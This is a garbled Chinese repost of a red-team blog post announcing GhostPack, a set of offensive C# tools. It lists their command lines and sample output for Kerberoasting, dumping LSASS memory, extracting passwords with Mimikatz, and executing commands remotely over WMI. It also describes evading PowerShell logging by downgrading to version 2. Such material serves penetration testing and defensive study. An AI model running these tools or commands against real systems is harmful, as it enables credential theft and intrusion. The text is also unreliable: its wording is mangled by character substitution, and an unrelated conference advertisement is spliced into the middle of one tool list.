你值得具有的 PowerShell 内网渗入工具包——GhostPack | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

你值得具有的 PowerShell 内网渗入工具包——GhostPack

申博_行业观察 申博 149次浏览 已收录 0个评论

任何一个在 SpecterOps 上关注过我或我的队友一段时间的人都晓得我们是 PowerShell 的忠厚粉丝。 我介入 PowerShell 的进击性项目已有4年了, @mattifestation 是 PowerSploit 和种种防御性项目的创始人, @jaredcatkinson  多年来一向在编写 PowerShell 的防御性项目,我的许多队友(@tifkin_, @enigma0x3, rvrsh3ll, @xorrior, @andrewchiles 等)在过去几年里已编写了种种与平安相干的 PowerShell 项目,合计有数千行代码。

到现在为止,挑选 PowerShell 的缘由应该是显而易见的; PowerShell 言语是图灵完全的,内置在当代 Windows 操纵体系中,你可以用它做任何你想做的事变。 我们对 PowerShell 的熟习以及它在当代平台上的无处不在,使得它成为我们用来完成考证观点和疾速成型的首选编程言语,以及像 PowerShell Empire 如许更细致的项目。

在 PowerShell 团队运用 PowerShell 版本 5 完成了令人敬畏的事情以后,一切都改变了(至少在肯定程度上) 。最典范的就是“PowerShell ♥ the Blue Team” 这篇博客文章在2015年6月宣布(具有嗤笑意味的是,该博客文章宣布于 Empire 宣布前的一个月) ,这篇博文细致引见了 PowerShell 引擎中集成的一切令人惊叹的新的平安防护特征,从更好的剧本转录,到有肯定深度的剧本壅塞纪录,AMSI 等等。 当关于这些主题的博文的热度逐步削弱的时刻,我有一个细微的预见,由于我感觉到打击性的 PowerShell 被给了一记致命的袭击。

然则你猜怎么着? 三年过去了,我们依然在许多场景中运用 PowerShell,(进击性的)这片天并没有塌下来。 关于险些每一个防御性的提高,进击性的整体每每以一样的体式格局做出了回应。 去年在 PSConfEU 的“Catch Me If You Can: PowerShell Red vs Blue”(抓到我假如你可以的话:PowerShell 的攻与防)演讲中,我细致形貌了面向平安的 PowerShell 汗青,而@mattifestation 在我们的 敌手战略: PowerShell 课程 中,对 PowerShell 相干的平安掌握做了一些深切的绕过研讨。

三年过去了,关于为何我们可以继承运用 PowerShell 代码,我重要观察到两点:

· 「第二版本的题目」: 遗憾的是,许多布置了 PowerShell 版本 5的构造要么没有卸载 PowerShell Version 2,要么出于向后兼容的缘由现实装置了版本2。版本2的 PowerShell 没有应用 PowerShell 团队完成的任何令人敬畏的平安庇护特征,因而假如我们可以强迫这个版本的引擎加载,那末我们就没有什么可忧郁的了。事实上,这可以很轻易地做到,比方实行 powershell.exe -version 2, 或许当我们在运用运用@tifkin_ 编写的UnmanagedPowerShell 项目时,我们可以手动加载任何版本。而且大多数时刻,平安软件也不会检测异常的 PowerShell 宿主顺序, 比方将 system.management.automation.dll 加载到非 powershell.exe 历程中。

· 缺少鸠合化的日记纪录: 从剧本块日记纪录的角度来看,PowerShell 关于我们这些进击者来说是恐怖的。 正如 Jeffrey Snover 和 Lee Holmes 在 2017年 DerbyCon 大会主题演讲中提到的,”我们晓得你可以挑选后破绽应用的开辟言语,我们很愉快你挑选了 PowerShell。” 但是,正如我们所看到的,为了使这个体系在环境中有效,a) Windows 10 或 server 2016 须要被普遍的布置,b)日记必需在主机级别上准确启用,c)主机日记必需转发到一个鸠合的 SIEM 或 剖析平台,d)事宜响应者必需关注并对日记举行准确的剖析,e)事宜响应者必需可以在合理的时间内作出反应。 假如这些部份中的任何一部份涌现毛病(在大型构造中经常涌现这类状况) ,红队和真正的进击者依然可以异常有效地运用具有进击性的 PowerShell 东西包。

我们是拉斐尔 · 马奇所说的”深度打击”的忠厚拥护者。 简而言之,我们喜好在单一东西或进击性手艺在特定环境中失利时有所挑选。 关于这一点,我们已说了好几年了(和其他许多人一样) ,当谈论到 PowerShell 的背景时,转向进击性 C# 是最有意义的。 只管你失去了惊人的 PowerShell 管道以及挪用加载内存中一切代码的单线程存根的才能,但你依然保留了对已存在的 .Net 库的一切接见,并取得分外的兵器化向量(想一想@subtee’s 的种种应用顺序白化绕过体式格局) ,有一些分外的殽杂选项,可以防备一切的 PowerShell 平安庇护。 只管进修构建一个 C# 项目而不是一个简朴的 PowerShell 剧本会有一些分外的本钱,但我们确切置信 PowerShell 是一个很好的通向 C# 的”有毒进口”。

所以说完这一点,我想引见一下我们在过去几个月里一向在做的一些事变。

GhostPack

Ghostpack (现在)是之前 PowerShell 功用的种种 C# 完成的鸠合,包含本日宣布的六个自力的东西集—— Seatbelt, SharpUp, SharpRoast, SharpDump, SafetyKatz, 和 SharpWMI。 一切这些项目都将托管在 GhostPack 的 GitHub 代码堆栈中,每一个项目作为一个自力的存储库分离出来。

附带申明: GhostPack 并不盘算只用 C# 代码,也不是地道的打击性东西包,只管本日宣布的项目都是 C# 代码。我们的设计是让构造包容许多与平安相干的项目,而且愿望这些项目不是 PowerShell 相干的。 另外,为了防备防御者构建署名检测该东西包(请斟酌标记各个作者的 Twitter 用户名🙂 ,我们现在不盘算为任何项目宣布二进制文件。 但是,一切的东西都是与 Visual Studio Community 2015 兼容的,所以你很轻易就可以本身构建。

充足表露: 这险些不是什么”新”的东西,只是许多人多年来一向运用的雷同手艺的差别完成。 另外,这里的一切代码都应该被认为是 beta 版——它已举行了一些测试,但依然存在大批的 bug)

平安带(Seatbelt

Seatbelt 是迄今为止宣布的最雄厚的一个项目。 这是一个态势感知平安搜检的交换所。 也就是说,它治理主机数据的网络,这些数据从打击和戍守的角度来看都多是风趣的。 从 PowerShell 平安设置,到当前用户的 Kerberos 票证,到删除的回收站项目,以及更多(当前搜检项有40+!)

平安带在它的README.md文件中形貌了大批已完成的功用,而且已证实它在我们的渗透活动中异常有效。 它深受@tifkin_的 Get-HostProfile.ps1  以及@andrewchiles 的HostEnum.ps1  PowerShell 剧本的影响。

SeatBelt.exe会网络以下体系数据:

· BasicOSInfo ——基础操纵体系信息(即架构、操纵体系版本等)

· RebootSchedule ——基于事宜 id 12和13的体系重新启动设计任务(末了15天)

· TokenGroupPrivs——当前历程或令牌的特权(比方 SeDebugPrivilege 等)

· UACSystemPolicies ——UAC 体系战略——经由过程注册表设置的 UAC 体系战略

· PowerShellSettings —— PowerShell 版本和经由过程注册表举行的平安设置

· AuditSettings — ——经由过程注册表举行的审计设置

· WEFSettings ——经由过程注册表举行 Windows 事宜转发(Windows Event Forwarding)的设置

· LSASettings ——LSA 设置(包含认证包)

· UserEnvVariables ——当前用户环境变量

· SystemEnvVariables ——当前体系环境变量

· UserFolders —— C:\Users\下的文件夹

· NonstandardServices——非标准效劳——二进制文件途径不在 C:\Windows\  中的效劳

· InternetSettings ——IE设置,包含代理效劳器设置

· LapsSettings ——LAPS 设置(假如已装置)

· LocalGroupMembers ——当地治理员、 RDP 和长途 DCOM 组的成员

· MappedDrives ——当前映照的驱动器

· RDPSessions ——当前传入的 RDP 会话

· WMIMappedDrives ——经由过程 WMI 映照的驱动器

· NetworkShares ——网络共享

· FirewallRules ——防火墙谢绝划定规矩,完全导出一切划定规矩

· AntiVirusWMI ——已注册的反病毒软件(经由过程 WMI)

· InterestingProcesses ——”意见意义”历程ー防御性产物和治理东西

· RegistryAutoLogon——注册表中的自动登录信息

· RegistryAutoRuns ——注册表中的自动运转信息

· DNSCache —— DNS 缓存条目(经由过程 WMI)

· ARPTable ——列出当前的 ARP 表和适配器信息(等价于 ARP-a)

· AllTcpConnections ——列出当前的 TCP 衔接和相干历程

· AllUdpConnections ——列出当前 UDP 衔接和相干历程

· NonstandardProcesses——历程的二进制途径不在 C:\Windows\中的历程

假如用户处于高度完全状况,则运转以下附加操纵:

· SysmonConfig——来自注册表的 Sysmon 设置

SeatBelt.exe user 敕令会网络以下用户数据:

· 搜检 Firefox 是不是有汗青文件

· 搜检 Chrome 是不是有汗青文件

· TriageIE ——IE浏览器书签和末了七天的汗青纪录

· SavedRDPConnections ——已保留的 RDP 衔接,包含用户名

· RecentRunCommands ——近来”运转”的敕令

· PuttySessions ——已保留的 Putty 设置

· PuttySSHHostKeys—— 已保留的 putty SSH 主机密钥

· RecentFiles ——剖析近来七天的「近来文件」快捷体式格局

汇聚黑客的智慧 | KCon 2019在京盛大开幕

KCon 黑客大会,汇聚黑客的智慧。 知道创宇出品,追求干货有趣的黑客大会。 KCon 2019 ——无 界 时间:8 月 23 – 25 日 地点:北京·昆泰嘉瑞文化中心   8月24日,由知道创宇主办的第八届KCon黑客大会(简称KCon 2019)在北京昆泰嘉瑞文化中心正式拉开大幕。KCon 2019以「无界」为主题,旨在与大家一同开启关于“∞”的探索,钻研技术宇宙中的无穷奥秘。   在首日两场专业的闭门培训结束后,伴随着热情洋溢的摇滚乐演出,KCon 2019演讲日干货技术分享

假如用户处于高度完全性状况,这些搜检将针对一切用户而不单单议针对当前用户。

其他杂项:

· CurrentDomainGroups —当前用户的当地用户组和域用户组

· Patches — 经由过程 WMI 装置的补丁(在某些体系上须要)

· LogonSessions —用户登录会话数据

· KerberosTGTData ——列出一切的 TGT 票证

· InterestingFiles ——与用户文件夹中的种种形式相匹配的文件

· IETabs ——翻开 Internet Explorer 浏览器标签页

· TriageChrome—— Chrome 浏览器书签和汗青

· TriageFirefox ——Firefox 汗青纪录(无书签)

· RecycleBin ——过去30天内删除的回收站中的文件(只能在用户高低文中运用)

· KerberosTickets ——列出 Kerberos 票证,假如是特权晋级的,则会列出一切按一切登录会话分组的票证

· 4624Events ——来自平安事宜日记的4624登录事宜

· 4648Events ——来自平安事宜日记的4648登录事宜

SeatBelt.exe all 会运转完全的罗列搜检,可以与 full 参数组合运用。

SeatBelt.exe [CheckName] [CheckName2] … 将只运转一个或多个指定的搜检(称号辨别大小写!)

SeatBelt.exe [system/user/all/CheckName] full 将阻挠任何过滤,并返回完全的效果。 默许状况下,某些搜检会被过滤(比方,不在 c:\Windows 的效劳等等)

下面是一些体系鸠合的例子:

 你值得具有的 PowerShell 内网渗入工具包——GhostPack

有许多的搜检项和风趣的信息网络操纵——我异常提议你运转这些参数,看看什么是合适你的!

SharpUp

SharpUp 是 PowerUp 应用 C# 完成权限提拔搜检的最先。 现在,只举行了最常见的搜检,还没有实行兵器化功用。 现在完成的搜检以下:

· GetModifiableServices ——返回当前用户可以修正的效劳

· GetModifiableServiceBinaries ——返回当前用户可以修正的二进制文件的效劳

· GetAlwaysInstallElevated ——返回 AlwaysInstallElevated 注册表项的值

· GetPathHijacks ——返回当前用户可以修正的%PATH% 中的任何文件夹

· GetModifiableRegistryAutoRuns ——返回设置为在 HKLM 自动运转设置中运转的任何可修正的二进制文件或剧本· GetSpecialTokenGroupPrivs ——返回”特别”用户权限(如 SeDebugPrivilege等等)

· GetUnattendedInstallFiles ——返回任何盈余的无人介入的装置文件

· GetMcAfeeSitelistFiles ——返回 McAfee SiteList.xml 文件途径

下面是一个运转的例子:

C:\Temp>SharpUp.exe
=== SharpUp: Running Privilege Escalation Checks ===
=== Modifiable Services ===
Name 
            
: VulnSvc
DisplayName
      
: VulnSvc
Description
      
:
State
            
: Stopped
StartMode
        
: Auto
PathName 
        
: C:\Program Files\VulnSvc\VulnSvc.exe
=== Modifiable Service Binaries ===
Name 
            
: VulnSvc2
DisplayName
      
: VulnSvc22
Description
      
:
State
            
: Stopped
StartMode
        
: Auto
PathName 
        
: C:\VulnSvc2\VulnSvc2.exe
=== AlwaysInstallElevated Registry Keys ===
=== Modifiable Folders in %PATH% ===
Modifable %PATH% Folder
  
: C:\Go\bin
=== Modifiable Registry Autoruns ===
=== *Special* User Privileges ===
=== Unattended Install Files ===
=== McAfee Sitelist.xml Files ===
[*] Completed Privesc Checks in 18 seconds

SharpRoast

SharpRoast 是 PowerView 种种 Kerberoasting 功用的 C# 版本。 KerberosRequestorSecurityToken.GetRequest Method() 要领由@machosec 提供给 PowerView。哈希以 hashcat  花样输出。

更多关于 Kerberoasting 的信息,包含 Tim Medin 关于这个主题的原始演讲的链接,请检察我2016年11月宣布的博文——“没有 Mimikatz 的 Kerberoasting”。

对当前域的一切用户举行Kerberoasting进击:

C:\Temp>SharpRoast.exe all
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

SamAccountName         : sqlservice
DistinguishedName      : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : MSSQLSvc/SQL.testlab.local
Hash                   : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$9994D1...

...

在当前域中针对特定的 SPN提议Kerberoasting进击:

C:\Temp>SharpRoast.exe "asdf/asdfasdf"
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

在当前域中针对某个特定的用户提议 Kerberoasting 进击:

C:\Temp>SharpRoast.exe harmj0y
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

对当前域中指定 OU 的用户举行Kerberoasting进击:

C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local"
SamAccountName         : testuser2
DistinguishedName      : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
ServicePrincipalName   : service/host
Hash                   : $krb5tgs$23$*$testlab.local$service/host*$08A6462...

在另一个(受信托的)的域的特定 SPN提议Kerberoasting进击:

C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]"
Hash                   : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...

对另一个(受信托的)域中的一切用户实行Kerberoasting进击:

C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local"
SamAccountName         : jason
DistinguishedName      : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
ServicePrincipalName   : test/test
Hash                   : $krb5tgs$23$*$dev.testlab.local$test/test*$9129566

...

这些敕令中的任何一个都可以接收一个[domain.com\user][password] ,以便运用显式凭据举行 Kerberoasting进击。比方:

[domain.com\user][password] ,以便运用显式凭据举行 Kerberoasting进击。比方:
C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!"
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

假如碰到须要运用二次跳板机的状况,这能够很有效。

SharpDump

SharpDump 本质上是种种 PowerSploit 的 Out-Minidump.ps1  的 C# 版本。MiniDumpWriteDump Win32 API 挪用用于为指定的历程 ID (默许状况下为 LSASS)建立一个转储到 to C:\Windows\Temp\debug<PID>.out 文件。GZipStream 用于将转储紧缩为 C:\Windows\Temp\debug<PID>.bin(.gz 花样) ,并删除原始的 minidump 文件。

转储 LSASS (默许值)的运转例子:

C:\Temp>SharpDump.exe

[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug808.out

[+] Dumping completed. Rename file to "debug808.gz" to decompress.

[*] Operating System : Windows 10 Enterprise N
[*] Architecture     : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

转储一个特定的历程 ID的例子:

C:\Temp>SharpDump.exe 8700

[*] Dumping notepad++ (8700) to C:\WINDOWS\Temp\debug8700.out
[+] Dump successful!

[*] Compressing C:\WINDOWS\Temp\debug8700.out to C:\WINDOWS\Temp\debug8700.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug8700.out

[+] Dumping completed. Rename file to "debug8700.gz" to decompress.

假如转储 LSASS,则可以在转储后下载这个紧缩的 minidump,并重命名为 dump<PID>.gz,以后在一个相似的平台上运转 Mimikatz 的 sekurlsa::minidump敕令:

 你值得具有的 PowerShell 内网渗入工具包——GhostPack

SafetyKatz

SafetyKatz 是 SharpDump、@gentilkiwi 的 Mimikatz 项目和@subtee 的.NET PE loader 项目的一个组合。

起首,MiniDumpWriteDump Win32 API 挪用用于建立一个保留到 C:\Windows\Temp\debug.bin 的 LSASS 转储。 然后运用@subtee 的 PELoader 加载一个自定义版本的 Mimikatz,该版本对 minidump 文件运转 sekurlsa:: logonpassword 和 sekurlsa:: ekeys,在实行完成后会删除该文件。 这个操纵可以使你可以从体系中提取暗码,而没必要传输数兆字节的 minidump 文件,然则这可以防备 Mimikatz 的特定 OpenProcess 附加到 LSASS 历程中。

C:\Temp>SafetyKatz.exe

[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug.bin
[+] Dump successful!

[*] Executing loaded Mimikatz PE

.#####.   mimikatz 2.1.1 (x64) built on Jul  7 2018 03:36:26 - lil!
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  / *** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( [email protected] )
'#####'        > http://pingcastle.com / http://mysmartlogon.com   *** /

mimikatz # Opening : 'C:\Windows\Temp\debug.bin' file for minidump...

Authentication Id : 0 ; 28935082 (00000000:01b983aa)
Session           : Interactive from 0
User Name         : blahuser
Domain            : WINDOWS10
Logon Server      : WINDOWS10
Logon Time        : 7/15/2018 1:07:55 PM
SID               : S-1-5-21-1473254003-2681465353-4059813368-1002
        msv :
        [00000003]
Primary
        * Username : blahuser
        * Domain   : WINDOWS10

...(snip)...

mimikatz # deleting C:\Windows\Temp\debug.bin

SharpWMI

末了一个小东西(SharpWMI)是一个种种 WMI 功用的简朴 C# 包装器。 它许可通用的长途(或当地) WMI 查询、经由过程 Win32_Process 的长途历程实行以及经由过程”暂时”永远 WMI 事宜定阅的长途 VBS 实行。

Local system enumeration  :
    SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
    Ex: SharpWMI.exe action=query query="select * from win32_process"
    Ex: SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\SecurityCenter2"

Remote system enumeration :
    SharpWMI.exe action=query computername=HOST1[,HOST2,...] query="select * from win32_service" [namespace=BLAH]
    Ex: SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
    Ex: SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process

Remote process creation   :
    SharpWMI.exe action=create computername=HOST[,HOST2,...] command="C:\temp\process.exe [args]"
    Ex: SharpWMI.exe action=create computername=primary.testlab.local command="powershell.exe -enc ZQBj..."

Remote VBS execution      :
    SharpWMI.exe action=executevbs computername=HOST[,HOST2,...]
    Ex: SharpWMI.exe action=executevbs computername=primary.testlab.local

这个东西内里没有什么革命性的东西,但 WMI 事宜定阅要领可以很好地效劳于我们。 基于计时器的事宜定阅是在长途体系上建立的,因而恣意的 VBS 剧本都可以作为 ActiveScriptEventConsumer 的有效载荷。 事宜触发器被触发后,你的 VBS 会被实行,以后一切都会被清算清洁:

C:\Temp>SharpWMI.exe action=executevbs computername=primary.testlab.local

[*] Creating 'Timer' object on primary.testlab.local
[*] Setting 'Debug' event filter on primary.testlab.local
[*] Setting 'Debug' event consumer on primary.testlab.local
[*] Binding 'Debug' event filter and consumer on primary.testlab.local

[*] Waiting 45 seconds for event to trigger on primary.testlab.local ...

[*] Removing 'Timer' internal timer from primary.testlab.local
[*] Removing FilterToConsumerBindingr from primary.testlab.local
[*] Removing 'Debug' event filter from primary.testlab.local
[*] Removing 'Debug' event consumer from primary.testlab.local

可以运用eventname=BLAH参数修正过滤器或运用者称号。 假如要变动实行的 VBS 剧本,请在编译之前修正项目顶部的 vbsPayload 字符串。 引荐运用 DotNetToJScript。

总结

我们愿望有人能以为这些代码对他有所协助,我们勉励任何对 C# 开辟优柔寡断的人冒险尝试一下! 关于最先这个代码库的 C# 开辟,我早先有点忧郁,然则在最初的几天以后,我意想到从 PowerShell 转换是何等的轻易。 另外,我还想重申,从我们进击者的角度来看,面向平安的 PowerShell 并没有”殒命”——我们仍将继承运用它,但我们愿望开辟出的东西集具有多样性。

我们另有一些东西和修正会在接下来的几个月中推出,所以愿望代码存储库可以坚持活泼。 接下来几周的某篇文章中,我将会引见一些 C# 兵器化的细节,但在那之前,愿望你玩得高兴!

本文翻译自:https://posts.specterops.io/ghostpack-d835018c5fc4


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明你值得具有的 PowerShell 内网渗入工具包——GhostPack
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址